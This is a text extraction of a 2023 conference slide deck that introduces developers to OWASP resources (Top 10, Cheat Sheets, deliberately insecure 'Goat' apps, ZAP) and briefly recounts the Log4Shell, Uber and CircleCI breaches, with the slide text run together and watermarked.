《Security Does Not Need To Be Fun_ Ignoring OWASP To Have A Terrible Time - Dwayne McDaniel - CNCF 2023.pptx》由会员分享,可在线阅读,更多相关《Security Does Not Need To Be Fun_ Ignoring OWASP To Have A Terrible Time - Dwayne McDaniel - CNCF 2023.pptx(72页珍藏版)》请在三个皮匠报告上搜索。
1、mcdwaynemcdwayneSecurity Does Not Need To Be Fun:Ignoring OWASP To Have A Terrible TimemcdwaynemcdwayneHi,Im DwayneDwayne McDaniel I live in Chicago Ive been a Developer Advocate since 2016 On Twitter mcdwayne Happy to chat about anything,hit me up Besides tech,I love improv,karaoke and going to roc
2、k and roll shows!mcdwayneAbout GitGuardianGitGuardian is the code security platform for the DevOps generation.With automated secrets detection and remediation,our platform enables Dev,Sec,and Ops to advance together towards the Secure Software Development Lifecycle.mcdwaynemcdwayneWhat Does Good Sec
3、urity Look Like?mcdwaynemcdwaynemcdwaynemcdwaynemcdwaynemcdwaynemcdwaynemcdwaynemcdwaynemcdwayneAll Technology Has Human CostsmcdwaynemcdwayneWhat Does Bad Security Look Like?mcdwaynemcdwayne“All happy families are alike;each unhappy family is unhappy in its own way.”Leo Tolstoy,Anna Kareninamcdwayn
4、emcdwayneA Few Unhappy Families CompaniesApache Log4Shell CVE-2021-44228Reported:24 November 2021-Had existed since 2013Log4J allowed requests to arbitrary LDAP and JNDI servers,which in turn could execute any code,including opening interactive shells.Impacted over 44%of corporate networks worldwide
5、.Top Companies With Products Affected Include:Adobe,Cisco,AWS,Broadcom,IBM,Okta,VMwaremcdwaynemcdwayneA Few Unhappy Families CompaniesUber Reported:15 Sept,2022Teenager from the Lapsus$hacking group phished login info from a super adminImmediately discovered access credentials hardcoded in PowerShel
6、l scripts that allowed pwnageReported first in the New York TimesmcdwaynemcdwayneCircleCIReported:4 January 2023An unauthorized third party leveraged malware deployed to a CircleCI engineers laptop in order to steal a valid,2FA-backed SSO session.Attackers ultimately gained access to many customers
7、GitHub OAuth credentials and platform security tokens.Caused a system wide token rotation,disrupting thousands of customers.Investigation ongoing.A Few Unhappy Families CompaniesmcdwaynemcdwayneSecurity Teams Are OutnumberedmcdwaynemcdwayneIn the best organizations developers outnumber security team
8、 members 100:1-Alex Rice,HackerOne#Security2022mcdwaynemcdwayneShift Left!Put Everyone On The Security TeammcdwaynemcdwayneBut Devs Already Have A Lot To Worry About:Delivery deadlinesBillable hoursNumber of tickets closedBugsDevOpsFighting KubernetesOnly so much timemcdwaynemcdwayneSecurity Inciden
9、tFocus On Security Delivery Slows DownFocus On New Feature Delivery TimesBusiness Priority View of Security Security IncidentmcdwaynemcdwayneThe Number Of Security Tools Is Overwhelming mcdwaynemcdwayneNow,here,you see,it takes all the running you can do,to keep in the same place.If you want to get
10、somewhere else,you must run at least twice as fast as that!The Red Queen,Through the Looking-Glass,and What Alice Found TheremcdwaynemcdwayneI Wish Some Benevolent Group Of Security Experts Could Help Me With This StuffmcdwaynemcdwayneOpen Web Application Security ProjectmcdwaynemcdwayneOWASP.ORG mc
11、dwaynemcdwayneOWASP MissionmcdwaynemcdwayneAs the worlds largest non-profit organization concerned with software security,OWASP:-Supports the building of impactful projects;-Develops&nurtures communities through events and chapter meetings worldwide;and-Provides educational publications&resourcesin
12、order to enable developers to write better software,and security professionals to make the worlds software more secure.OWASP MissionmcdwaynemcdwayneOK,But how do I navigate this site?mcdwaynemcdwayneProjectsCommunitiesEventsEducation and TrainingPublications and ResourcesOWASP Overviewmcdwaynemcdway
13、neOWASP ProjectsOpen Source reposBuilt by volunteers and expertsNew weekly submissions from the community250 total projects in any state150 in usable statemcdwaynemcdwayneFlagship ProjectsProduction Projects(new)Lab ProjectsIncubator ProjectsOWASP Projects Categoriesmcdwaynemcdwayne18 Current Flagsh
14、ip Projects:The OWASP Flagship designation is given to projects that have demonstrated strategic value to OWASP and application security as a whole.OWASP Flagship ProjectsmcdwaynemcdwayneOWASP Lab Projects34 Lab Projects:OWASP Labs projects represent projects that have produced an OWASP reviewed del
15、iverable of value.mcdwaynemcdwayneOWASP Incubator Projects105 Incubator Projects:OWASP Incubator projects represent the experimental playground where projects are still being fleshed out,ideas are still being proven,and development is still underway.mcdwaynemcdwayneTool Projects-75Documentation Proj
16、ects-80Code Projects-34Other-3OWASP Projects TypesmcdwaynemcdwayneOWASP ProjectsOrganized around CRE,CommonRequirementEnumerationmcdwaynemcdwayneOWASP CRELinks together standards(NIST,CWE)in a coherent wayHelps clarify what each OWASP project is specifically addressinghttps:/www.opencre.org allows y
17、ou to just search the high level topicmcdwaynemcdwayneCommunitymcdwaynemcdwayneChapters all over the worldOrganized via MeetUp in most areasMany online eventsOWASP CommunitymcdwaynemcdwayneOWASP CommunityOWASP Meetup at the GitGuardian Office October 2022mcdwaynemcdwayneEventsmcdwaynemcdwayneMultipl
18、e events per yearGlobal EventsAppSec DaysPartner EventsOWASP EventsmcdwaynemcdwayneOWASP EventsmcdwaynemcdwayneEducation and Trainingmcdwaynemcdwaynehttps:/secureflag.owasp.org/OWASP Education And Trainingmcdwaynemcdwaynehttps:/secureflag.owasp.org/OWASP Education And TrainingmcdwaynemcdwayneOWASP E
19、ducation And TrainingmcdwaynemcdwaynePublications and ResourcesmcdwaynemcdwayneOWASP Publications and ResourcesBooksMany free resources onlineThere is a good deal of crossover with ProjectsmcdwaynemcdwayneOK,OWASP Does A Lot How can I use this?mcdwaynemcdwayneOWASP Getting Started1.Top 102.Cheat She
20、et Series 3.Goats 4.ZAPmcdwaynemcdwayneTop 10 Types Of AttacksmcdwaynemcdwayneOWASP Top 10 Types of Attacks“The OWASP Top 10 is a standard awareness document for developers and web application security.It represents a broad consensus about the most critical security risks to web applications.”Update
21、d Yearly mcdwaynemcdwayneOWASP Top 10 Types of AttacksmcdwaynemcdwayneOWASP Top 10 Types of AttacksmcdwaynemcdwayneCheat Sheet SeriesmcdwaynemcdwayneOWASP Cheat Sheet Serieshttps:/cheatsheetseries.owasp.org/mcdwaynemcdwayneOWASP Cheat Sheet SeriesmcdwaynemcdwayneGoats Greatest Of All Time?mcdwaynemc
22、dwayneGoats are deliberately insecure applications for testing and training purposesLab ProjectsWebGoatNode.js GoatWrongSecretsIncubator Projects or Proposed Pygoat AndroGoat ChainGoat Laravel Goat Webgoat PHP SupplyChainGoatOWASP GoatsmcdwaynemcdwayneOWASP GoatsmcdwaynemcdwayneOWASP GoatsExtremely
23、welldocumentedan discussedin mediamcdwaynemcdwayneDemo by maintainer on YouTubehttps:/ ZAPmcdwaynemcdwayneOWASP ZAPmcdwaynemcdwayneOWASP ZAPmcdwaynemcdwayneIn ConclusionmcdwaynemcdwaynemcdwaynemcdwaynemcdwaynemcdwayneOWASP Getting Started1.Top 102.Cheat Sheet Series 3.Goats(not the greatest of all t
24、ime)4.ZAPmcdwaynemcdwayneHi,Im DwayneDwayne McDaniel I live in Chicago Ive been a Developer Advocate since 2016 On Twitter mcdwayne Happy to chat about anything,hit me up Besides tech,I love improv,karaoke and going to rock and roll shows!mcdwaynemcdwayneSecurity Does Not Need To Be Fun:Ignoring OWASP To Have A Terrible Time